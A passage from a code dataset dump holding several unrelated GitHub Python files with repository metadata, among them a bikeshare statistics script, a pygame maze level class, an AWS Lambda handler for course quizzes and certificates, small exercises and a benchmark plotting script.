precioIngred = PrecioIngred(lstDatos[PRECIO_INGRED, FECHA_INGRESO_INGRED])\n return precioIngred\n \n @staticmethod\n def object2Data(precioIngred):\n return [precioIngred.ingrediente, precioIngred.cant]\n \n @staticmethod\n def editObject(precioIngred, lstDatos):\n precioIngred.precio = lstDatos[PRECIO_INGRED]\n precioIngred.fecha_ingreso = lstDatos[FECHA_INGRESO_INGRED]\n \n @staticmethod\n def type():\n return PrecioIngred","repo_name":"jorgesaw/imperial","sub_path":"imperial/imperial/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":39548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11324750815","text":"fin = open('words.txt')\n\n'''for line in fin:\n if len(line) == 20:\n print(line)'''\n\n#fin.seek(0)\n\ndef has_no_e(s):\n tot = len(s)\n count = 0\n for i in s:\n if 'e' not in i:\n count+= 1\n print(i)\n\n return count / tot * 100\n\n\na = [x.strip() for x in fin]\n\nper = has_no_e(a)\nprint(per)\n","repo_name":"0siris7/Think-python-repo","sub_path":"wordplay.py","file_name":"wordplay.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29546294206","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n# glopal Tuples of monthes and days names to be used later\nMonths = (\"january\", \"february\", \"march\", \"april\", \"may\", \"june\")\nDays = (\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\")\n\n# Global Flages\nMonth_filter_flage = False\nDay_filter_flage = False\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n \n print('\\nHello! Let\\'s explore some US bikeshare data!')\n print('---------------------------------------------\\n')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True :\n try :\n inputed_city = input(\"Choose one of the below cities to take a look at thier stats. \\nType one of these cities (chicago, new york city, washington): \").lower()\n if inputed_city == \"chicago\" or inputed_city == \"new york city\" or inputed_city == \"washington\" :\n print (\"\\nGreat you choose \",inputed_city, \"\\n\")\n break\n else :\n print (\"\\nWrong city name please try again.\\nHint: make sure that your spilling is as given list of cities....\\n\")\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n # get user input for month (all, january, february, ... , june)\n while True :\n try :\n month_filter_enable = input(\"Do you want to apply a filter by month? [ (yes) or (no) ].\\n ---> \").lower()\n break\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n while True :\n try : \n if month_filter_enable == \"yes\" :\n print('\\nOK then choose one of the first 6 monthes of the year to filter data.') \n inputed_month = input('Type one of these monthes [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\"] : ').lower() \n if inputed_month in Months :\n print (\"\\nGreat you choose \", inputed_month, \"\\n\")\n break \n else :\n print (\"\\nWrong month name please try again.\\nHint: make sure that your spilling is as given list of months provided....\\n\") \n elif month_filter_enable == \"no\" :\n print ('\\nOK then all 6 months are included.')\n inputed_month = \"all\" \n break\n else :\n print ('\\nOK that is not a clear [yes] or [no].')\n month_filter_enable_sure = input(\"\\nAre you sure of your choice?\\n(yes) ---> to contiue and use all months.\\n(no) ---> to try again and apply a month filter.\\n---> \").lower() \n if month_filter_enable_sure != \"no\":\n inputed_month = \"all\"\n print ('\\nOK then all 6 months are included.')\n break\n else : \n month_filter_enable = \"yes\"\n continue\n except :\n print (\"\\nWow wrong input please try again....\")\n continue\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True :\n try :\n day_filter_enable = input(\"\\nDo you want to apply a filter by day? [ (yes) or (no) ].\\n ---> \").lower()\n break\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n while True :\n try : \n if day_filter_enable == \"yes\" :\n print ('\\nOK then choose a day of the week to filter data.')\n inputed_day = input('Type one of these days [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\"] : ').lower()\n if inputed_day in Days :\n print (\"\\nGreat you choose \", inputed_day, \"\\n\")\n break\n else :\n print (\"\\nWrong day name please try again.\\nHint: make sure that your spilling is as given list of days....\\n\")\n elif day_filter_enable == \"no\" :\n print ('\\nOK then all days of the week are included.')\n inputed_day = \"all\" \n break\n else :\n print ('\\nOK that is not a clear [yes] or [no].')\n day_filter_enable_sure = input(\"\\nAre you sure of your choice?\\n(yes) ---> to contiue and use all days.\\n(no) ---> to try again and apply a day filter.\\n---> \").lower() \n if day_filter_enable_sure != \"no\":\n inputed_day = \"all\"\n print ('\\nOK then all days of the week are included.')\n break\n else : \n day_filter_enable = \"yes\"\n continue\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n print('-'*100)\n return inputed_city, inputed_month, inputed_day\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n #declearing global flages to apply changes\n global Month_filter_flage, Day_filter_flage\n \n #load all the desired city data\n city_data_df = pd.read_csv (CITY_DATA[city])\n \n #filtering all data by:\n \n # 1-converting the ride [Start Time] column of the Data frame from (string object) to a (Date Time object).\n city_data_df[\"Start Time\"]= pd.to_datetime(city_data_df[\"Start Time\"])\n \n # 2-creating new columns for [month] and [day] from [Start Time] column\n city_data_df[\"Month\"]= city_data_df[\"Start Time\"].dt.month\n city_data_df[\"Day\"]= city_data_df[\"Start Time\"].dt.weekday_name\n \n # 3-filtring data by month (if user desired)\n if month in Months :\n Month_filter_flage = True\n month= Months.index(month) + 1 # got the month int number to filter the [Month] column with\n city_data_df= city_data_df[city_data_df[\"Month\"] == month] # filtring the data frame rows my the month number \n else :\n Month_filter_flage = False\n \n # 4-filtring data by day (if user desired)\n if day in Days :\n Day_filter_flage = True\n city_data_df= city_data_df[city_data_df[\"Day\"] == day.title()] #filtring the data frame by day name {remember [data_frame.dt.weekday_name] returnes capital first letter #of the day name}\n else :\n Day_filter_flage = False\n \n # 5-Return filtered data frame for further processing\n return city_data_df\n\n#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef time_stats(df, month, day):\n \"\"\"\n Displays statistics on the most frequent times of travel.\n \n Args:\n (df ) Pandas DataFrame containing city data filtered as per user inputs\n (str) month - name of the month inputed by the user\n (str) day - name of the day of week inputed by the user\n Returns:\n no return\n \"\"\"\n # printing a title \n print (\"\\n|*************************************|\")\n print (\"|....Most Frequent Times of Travel....|\")\n print (\"|*************************************|\\n\")\n\n start_time = time.time()\n\n # display the most common month\n if Month_filter_flage == True : # if we filter by month we do not need any computation to get common month\n print(\"Most common month is the one you choose as a filter : {}\\n\".format(month.title()))\n else :\n # get most common month using mood method\n most_common_month = df[\"Month\"].mode()[0]\n print(\"Most common month is: {}\\n\".format(Months[most_common_month-1].title()))\n \n # get the most common day of week\n if Day_filter_flage == True : # if we filter by month we do not need any computation to get common day\n print(\"Most common day of the week is one you choose as a filter : {}\".format(day.title()))\n else :\n # get most common day of the week using mood method\n most_common_day = df[\"Day\"].mode()[0]\n print(\"Most common day of the week is: {}\\n\".format(most_common_day))\n \n # get most common hour in the day using mood method\n df[\"start_hour\"]= df[\"Start Time\"].dt.hour # creating new column for start hour only to filter data with\n most_common_hour = df[\"start_hour\"].mode()[0]\n print(\"Most popular start hour is: {}\".format(most_common_hour))\n\n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \ndef station_stats(df):\n \"\"\"\n Displays statistics on the most popular stations and trip.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no return \n \"\"\"\n \n print (\"\\n|**************************************|\")\n print (\"|....Most Popular Stations and Trip....|\")\n print (\"|**************************************|\\n\")\n\n start_time = time.time()\n\n # display most commonly used start station using mode method on the [Start Satation] column\n most_common_start_station = df[\"Start Station\"].mode()[0]\n print(\"Most common start station is: [ {} ]\\n\".format(most_common_start_station))\n\n # display most commonly used end station\n most_common_end_station = df[\"End Station\"].mode()[0]\n print(\"Most common end station is: [ {} ]\\n\".format(most_common_end_station))\n\n # display most frequent trip\n df[\"trip\"]= df[\"Start Station\"] + \":\" + df[\"End Station\"] # creating new column for Trip to get trip stats\n most_common_trip = df[\"trip\"].mode()[0]\n print(\"Most common trip is : from [{}] to [{}]\".format(most_common_trip.split(\":\")[0], most_common_trip.split(\":\")[1]))\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef trip_duration_stats(df):\n \"\"\"\n Displays statistics on the total and average trips duration.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no return \n \"\"\"\n \n print (\"\\n|***************************|\")\n print (\"|....Trip Duration Stats....|\")\n print (\"|***************************|\\n\")\n start_time = time.time()\n \n # display total travel time\n total_trips_time = df[\"Trip Duration\"].sum(axis = 0, skipna = True)\n print(\"Total time of all trips : {} hours\\n\".format(round((total_trips_time/60)/60, 1)))\n \n # display mean travel time\n average_trip_time = df[\"Trip Duration\"].mean(axis = 0, skipna = True)\n print(\"Average trip duration is: {} mins\".format(round(average_trip_time/60, 1)))\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef user_stats(df, city):\n \"\"\"\n Displays statistics on df users.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n (str) (str) inputed name of the city to analyze\n Returns:\n no return\n \"\"\"\n print (\"\\n|***************************|\")\n print (\"|....Getting Users Stats....|\")\n print (\"|***************************|\\n\")\n start_time = time.time()\n\n # Display counts of user types\n print (\"....User Type Counts....\\n\")\n user_types_counts= df[\"User Type\"].value_counts()\n print (\"There are {} Subscribers\\n\".format(user_types_counts[\"Subscriber\"]))\n print (\"There are {} Customers\\n\".format(user_types_counts[\"Customer\"]))\n \n # excloding washington state from gender and birth year calculations\n if city != \"washington\" :\n # Display counts of gender\n print (\"\\n....User Gender Counts....\\n\")\n user_gender_counts= df[\"Gender\"].value_counts()\n print (\"There are {} Males\\n\".format(user_gender_counts[\"Male\"]))\n print (\"There are {} Females\\n\".format(user_gender_counts[\"Female\"]))\n\n # Display earliest, most recent, and most common year of birth using df.min(), df.max() and df.mode() methods. \n print (\"\\n....User Age Stats....\\n\")\n earlist_birth_year= df[\"Birth Year\"].min()\n print(\"Earlist birth year is {}\\n\".format(int(earlist_birth_year)))\n\n most_recent_birth_year= df[\"Birth Year\"].max()\n print(\"Most recent birth year is {}\\n\".format(int(most_recent_birth_year)))\n\n most_common_birth_year= df[\"Birth Year\"].mode()[0]\n print(\"Most common birth year is {}\".format(int(most_common_birth_year)))\n else :\n print (\"\\n|********************************************************************************|\")\n print (\"|Sorry user gender and birth year stats Data does not exist for washington state.|\")\n print (\"|********************************************************************************|\")\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef print_city_title(city):\n \"\"\"\n prints City title in a reqtangle of '#' .\n \n Args:\n (str) (str) inputed name of the city to analyze\n Returns:\n no return\n \"\"\"\n print(\"\\n###################################################\"+\"#\"*(len(city)-2))\n print(\"#/\\/\\/\\/\\/\\ LET US DISCOVER {} STATS :) /\\/\\/\\/\\/\\#\".format(city.upper()))\n print(\"###################################################\"+\"#\"*(len(city)-2)+\"\\n\")\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef print_raw_data(df):\n \"\"\"\n promtes user if he want to prints raw data of the city.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no return\n \"\"\"\n list_of_colums_in_df = df.columns.tolist() # getting a list of columns in df\n list_of_colums_in_df = list_of_colums_in_df[1:len(list_of_colums_in_df)-4] # slicing the column list to view original unmodified raw input file data\n current_row_count = 0 # counter for looping through the df index\n df_rows_limit = len(df.index) # getting number of rows in df \n first_entry= False #flage for loope first time entry\n \n while True:\n if first_entry != False :\n while True :\n try :\n answer = input('\\nWould you like to see more ? Enter [yes] or [any key else to continue].\\n ---> ')\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n else :\n while True :\n try :\n answer = input('\\nWould you like to see some raw data ? Enter [yes] or [any key else] to continue.\\n ---> ')\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n if answer.lower() != 'yes':\n print (\"Ok no raw data....\")\n break\n else :\n if first_entry != False :\n print (\"\\nHere are another 5 trips raw data : \\n\")\n else :\n print (\"\\nHere are 5 trips raw data : \\n\")\n first_entry = True\n\n if current_row_count < df_rows_limit-5 :\n print(df[list_of_colums_in_df].loc[current_row_count:current_row_count+5,:].head())\n current_row_count+= 5\n else :\n print(\"\\nNo more raw data to displayed !!\")\n break\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef programe_close() :\n \"\"\"\n promtes user if he want to close programe or continue.\n \n Args: \n no return\n Returns: \n (boolean) True for close peograme or faulse to continue\n \"\"\"\n done = False\n while True :\n try :\n restart = input('\\nWould you like to restart? Enter [yes] to restart or [any key else] to exit.\\n --->')\n if restart.lower() != 'yes':\n print (\"Ok Good bye....\")\n done = True\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n return done \n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n print_city_title(city)\n time_stats(df, month, day)\n station_stats(df)\n trip_duration_stats(df) \n user_stats(df, city)\n print_raw_data(df)\n if programe_close() : break\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"MuhammedAbdelftah/US-bike-share-project","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":18909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39396280661","text":"import pygame\r\nfrom constants import *\r\nimport random\r\n\r\n\r\nclass Level:\r\n \"\"\"class to create a new level\"\"\"\r\n\r\n def __init__(self, file='level_file.txt'):\r\n self.file = file\r\n self.structure = 0\r\n self.three_xy_of_objetcs = []\r\n self.paste_the_3_objects = []\r\n self.mgpaths = []\r\n\r\n def generate(self):\r\n \"\"\"A method to generate the level according level's file.\r\n Create a general list, containing a list for each line\"\"\"\r\n # Open file\r\n with open(self.file, \"r\") as file:\r\n level_structure = []\r\n # for loop for the lines of the file\r\n for line in file:\r\n line_level = []\r\n # For loop for the sprites (letters) in each line\r\n for sprite in line:\r\n # Ignoring the \"\\n\" on the end of the line\r\n if sprite != '\\n':\r\n # Appending the sprite to the list of the lines\r\n line_level.append(sprite)\r\n # Appending the line to the list of the level_structure\r\n level_structure.append(line_level)\r\n # To save this structure\r\n self.structure = level_structure\r\n\r\n # Chosing three random numbers for the x position\r\n r_list = []\r\n while len(r_list) != 3:\r\n for d in range(0, 3):\r\n r = random.randint(0, 102)\r\n if r not in r_list:\r\n r_list.append(r)\r\n\r\n def show(self, window):\r\n xy_objetcs = []\r\n \"\"\"Method for displaying the level according to the \r\n\t\tstructure's list from generate()\"\"\"\r\n # Loading images with transparency\r\n wall = pygame.image.load(WALL_IMAGE).convert()\r\n start = pygame.image.load(START_IMAGE).convert()\r\n arrived = pygame.image.load(ARRIVED_IMAGE).convert_alpha()\r\n syringe = [pygame.image.load(PLASTIC_PIPE_IMAGE).convert_alpha(),\r\n pygame.image.load(ETHER_IMAGE).convert_alpha(),\r\n pygame.image.load(NEEDLE_IMAGE).convert_alpha()]\r\n erase_object_image = pygame.image.load(MINI_BACKGROUND_IMAGE).convert()\r\n\r\n # For loop through the list of the leve\r\n num_line = 0\r\n for line in self.structure:\r\n # On parcourt les listes de lignes\r\n num_step = 0\r\n for sprite in line:\r\n # Calculate the x and y position in pixels\r\n x = num_step * SPRITE_SIZE\r\n y = num_line * SPRITE_SIZE\r\n if sprite == 'w': # w = Wall\r\n window.blit(wall, (x, y))\r\n elif sprite == 's': # s = Start\r\n window.blit(start, (x, y))\r\n elif sprite == 'a': # a = Arrived\r\n window.blit(arrived, (x, y))\r\n elif sprite == '0': # 0 = free space\r\n xy_objetcs.append([x, y])\r\n num_step += 1\r\n num_line += 1\r\n three_xy_of_objetcs = [xy_objetcs[self.r_list[n]] for n in range(\r\n 0, 3)] # selection les trois paires x et y au azar\r\n\r\n self.three_xy_of_objetcs = three_xy_of_objetcs\r\n # list to add the three objects randomly\r\n self.paste_the_3_objects.append([window.blit(syringe[i], (\r\n three_xy_of_objetcs[i][0],\r\n three_xy_of_objetcs[i][1])) for i in range(3)])\r\n\r\n for x in self.mgpaths:\r\n\r\n if x in self.three_xy_of_objetcs:\r\n window.blit(erase_object_image, (x[0], x[1]))\r\n","repo_name":"pythondev-pro/my_projects","sub_path":"Openclassrooms Python Developer Projects/p3_MEIO-DIA_Pedro/mg_labyrinth_classes/Level.py","file_name":"Level.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34536125976","text":"inputStr = \"0\t5\t10\t0\t11\t14\t13\t4\t11\t8\t8\t7\t1\t4\t12\t11\"\n\ndef maxIndex(l):\n out = 0\n highest = l[0]\n for i in range(len(l)):\n if l[i] > highest:\n out = i\n highest = l[i]\n return out\n\nbanks = list(map(int, inputStr.split('\\t')))\nvisited = {}\ncurCycle = 0\nwhile tuple(banks) not in visited:\n visited[tuple(banks)] = curCycle\n m = maxIndex(banks)\n blocks = banks[m]\n banks[m] = 0\n for i in range(blocks):\n m = (m + 1) % len(banks)\n banks[m] += 1\n curCycle += 1\nprint(curCycle - visited[tuple(banks)])","repo_name":"kevinmchung/AdventOfCode","sub_path":"2017/Day6/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33993517885","text":"import json\nimport logging\nfrom lib.quizes import set_quiz_status_db, get_quiz_status_db\nfrom lib.classes import get_class_enrollment_db, set_class_enrollment_db, log_class_part_view_db, get_set_class_complete\nfrom lib.certificate import generate_certificate\nfrom lib.emails import email_welcome_messages, email_congrats_messages, email_reminder_messages\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef send_emails(event, context):\n email_welcome_messages()\n email_congrats_messages()\n email_reminder_messages()\n\ndef gen_class_certificate(event, context):\n userId = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n className = requestData['className']\n\n quiz_status = get_quiz_status_db(userId, className)\n\n if ( len(quiz_status['passed']) > 0 and len(quiz_status['failed']) == 0 and len(quiz_status['untried']) == 0 ):\n # all quizes passed\n classInfo = get_set_class_complete(userId, className)\n\n cert = generate_certificate(userId, classInfo['display_name'], '%s-%s-%s' % (classInfo['passed_year'], classInfo['passed_month'], classInfo['passed_day']), classInfo['cert_number'], classInfo['cert_hash'], classInfo['course_name'])\n\n body = {\n \"message\": \"certificate generated\",\n \"url\": cert\n }\n \n statusCode = 200\n else:\n statusCode = 404\n body = {\n \"message\": \"certificate not able to be generated\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\n\ndef get_class_enrollment(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n className = event['queryStringParameters']['className']\n\n enrollment = get_class_enrollment_db(user, className)\n\n logger.info(\"enrollment retrieved for user %s in class %s: %s\" % (user, className, enrollment))\n\n body = {\n \"message\": \"enrollment retrieved\",\n \"enrolled\": enrollment\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\ndef set_class_enrollment(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n className = requestData['className']\n firstName = requestData['firstName']\n lastName = requestData['lastName']\n\n enrollment = set_class_enrollment_db(user, className, firstName, lastName)\n\n logger.info(\"enrollment indicated for user %s in class %s\" % (user, className))\n\n body = {\n \"message\": \"enrollment indicated\",\n \"enrolled\": True\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n # Add marketo call to note enrollment of user in a course\n\n return response\n\ndef log_training_view(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n\n className = requestData['className']\n partName = requestData['partName']\n\n log_class_part_view_db(user, className, partName)\n\n body = {\n \"message\": \"view indicated\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\n\n\ndef get_quiz_status(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n className = event['queryStringParameters']['className']\n\n quizStatus = get_quiz_status_db(user, className)\n\n body = {\n \"message\": \"Quiz status retrieved\",\n \"quizStatus\": quizStatus\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\ndef set_quiz_status(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n\n set_quiz_status_db(user, requestData[\"className\"], {\"passed\": requestData[\"passed\"], \"failed\": requestData[\"failed\"]})\n\n logger.info(\"quiz status indicated for user %s in class %s with passed %s and failed %s\" % (user, requestData[\"className\"], json.dumps(requestData[\"passed\"]), json.dumps(requestData[\"failed\"])))\n\n body = {\n \"message\": \"Updated quiz status\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n","repo_name":"neo-technology/neo4j-graphacademy-api","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24481696708","text":"def binarySearch(input, searchInput):\n input.sort()\n first = 0\n last = len(input)-1\n print(input)\n while first <=last:\n mid = (first+last)//2\n #print(mid)\n if input[mid]==searchInput:\n return mid,searchInput\n elif searchInput > input[mid]:\n first = mid+1\n else:\n last =mid-1\n if first>last:\n return None\n\n\n####Driver Code######\ninput = [12,4,23,1,98,11,21]\nprint(binarySearch(input,1))\n\n\n#Time Complexity = O(log n)\n#Space Complexity = O(1)","repo_name":"DeepaliTandale/DS_Algorithms","sub_path":"DS_Searching/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9519510582","text":"import matplotlib.pyplot as plt\n\ndef coordinate():\n print(\"Enter an x value:\")\n # read in the user's response and store it in a variable named x.\n x = int(input())\n print(\"Enter an y value:\")\n # read in the user's response and store it in a variable named y.\n y = int(input())\n\n # return a tuple containing x and y.\n return (x,y)\n\ndef path():\n print(\"Retrieving path...\")\n \n #creates empty list for x_values and y_values\n x_values = []\n y_values = []\n \n #loop that iterates 4 times\n for count in range(4):\n \n #Calls the first function and stores the result in a variable named data.\n data = coordinate()\n \n #Adds the first item of data (the x value) to x_values.\n x_values.append(data[0])\n #Adds the second item of data (the y value) to y_values.\n y_values.append(data[1])\n \n #return a list containing x_values and y_values. \n return [x_values,y_values]\n\ndef run():\n \n #calls the second function and store the result in variable named value\n values = path()\n \n #display a line plot using values[0] for the x values and values[1] for the y values.\n #The line plot should draw a red dashed line with circle markers\n plt.plot(values[0],values[1], 'r--o')\n \n # contain suitable labels for the axes.\n plt.xlabel(\"x values\")\n plt.ylabel(\"y values\")\n \n #shows the graph\n plt.show()\n \n \nrun()\n \n \n","repo_name":"xspize/com411","sub_path":"visual/plots/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3808785908","text":"from djitellopy import Tello\nimport time\nimport cv2\n\n\n\n\ntello = Tello()\ntello.connect()\n\ntello.query_battery()\n\n\n# tello.streamoff()\n\ntello.streamon()\nframe_read = tello.get_frame_read()\n\nprint(\"\\n=================================\\n\")\nprint(type(frame_read))\n\nprint(\"\\n=================================\\n\")\nprint(frame_read)\n\ntello.streamoff()\n# tello.takeoff()\n# cv2.imwrite(\"picture.png\", frame_read.frame)\n\n# tello.land()","repo_name":"jarvisN/non2023","sub_path":"python/10_NonDrone/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3708155632","text":"import time as t\nfrom math import sqrt\nfrom colorama import Fore, Back, Style\n\nx=int(input('Square roots for how many numbers?: ')) \n\nm=t.gmtime() #Returns current time and date\nn=':'.join(str(i) for i in m[3:6]) #Acess only date, creating a string with info\nprint('Current time '+Fore.GREEN+n+Style.RESET_ALL+'(h:m:s)') #Prints current time in green\n\n\nz=t.time() #start time\nfor i in range(1,x+1): #calculates the square roots for x amount of numbers\n sqrt(i) #no variable defined, since the interest is in the cicle time\n if i==x:\n y=t.time() #endtime\n print(\"Elapsed time:{} {:.2E} {}(units of time)\".format(Fore.RED,(y-z),Style.RESET_ALL))","repo_name":"Diogo-Mateiro/PSR_23-24","sub_path":"Python/Parte3/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1081483612","text":"from __future__ import annotations\n\nimport json\nimport re\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom enum import Enum\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\n\nELEMENT_COUNT_REGEX = re.compile(r\"(?<=/)[0-9]+\")\nRESULTS_FILE = (\n Path(os.path.dirname(os.path.realpath(__file__))) / \"results/benchmark_results.json\"\n)\n\n\nclass ElementType(Enum):\n Float = 0\n Double = 1\n Int = 2\n\n @staticmethod\n def from_str(type: str) -> ElementType:\n return ElementType[type.capitalize()]\n\n @staticmethod\n def from_benchmark_name(name: str) -> ElementType:\n if \"float\" in name:\n return ElementType.Float\n elif \"double\" in name:\n return ElementType.Double\n elif \"int\" in name:\n return ElementType.Int\n else:\n raise Exception(\"Unknown element type.\")\n\n\n@dataclass\nclass Benchmark:\n cpu_time_s: float\n real_time_s: float\n iterations: int\n element_count: int\n element_type: ElementType\n label: str\n\n def __post_init__(self):\n self.cpu_time_per_iteration_s = self.cpu_time_s / self.iterations\n\n\nBenchmarkClassification = dict[ElementType, dict[str, list[Benchmark]]]\n\n\ndef parse_benchmarks(\n json_dict: dict,\n) -> tuple[BenchmarkClassification, list[Benchmark]]:\n benchmarks: list[Benchmark] = []\n classification: BenchmarkClassification = {}\n for bench in json_dict:\n\n if bench[\"run_type\"] != \"iteration\":\n continue\n\n element_count_match = ELEMENT_COUNT_REGEX.search(bench[\"name\"])\n\n if element_count_match == None:\n raise Exception(\n f\"Failed to parse element count number from {bench['name']}\"\n )\n else:\n assert element_count_match is not None\n element_count: int = eval(element_count_match.group(0))\n\n element_type = ElementType.from_benchmark_name(bench[\"name\"])\n label = bench[\"name\"].split()[0]\n benchmark = Benchmark(\n bench[\"cpu_time\"],\n bench[\"real_time\"],\n bench[\"iterations\"],\n element_count,\n element_type,\n label,\n )\n benchmarks.append(benchmark)\n if element_type not in classification:\n classification[element_type] = {label: [benchmark]}\n continue\n if label not in classification[element_type]:\n classification[element_type][label] = [benchmark]\n continue\n\n classification[element_type][label].append(benchmark)\n\n return classification, benchmarks\n\n\ndef load_benchmark_results():\n with RESULTS_FILE.open() as results_file:\n results_json = json.load(results_file)\n return results_json\n\n\ndef plot_benchmarks(classification: BenchmarkClassification):\n\n fig, axs = plt.subplots(1, len(classification))\n\n for i, element_type in enumerate(classification):\n\n std_benchmark_list = classification[element_type][\"std\"]\n std_cpu_time = np.array(\n [std_benchmark.cpu_time_s for std_benchmark in std_benchmark_list]\n )\n\n for label in classification[element_type]:\n benchmark_list = classification[element_type][label]\n ax = axs[i]\n\n element_count = np.array(\n [benchmark.element_count for benchmark in benchmark_list]\n )\n cpu_time = np.array([benchmark.cpu_time_s for benchmark in benchmark_list])\n\n ax.plot(element_count, cpu_time, label=benchmark_list[0].label)\n ax.set_title(f\"{element_type.name} sort 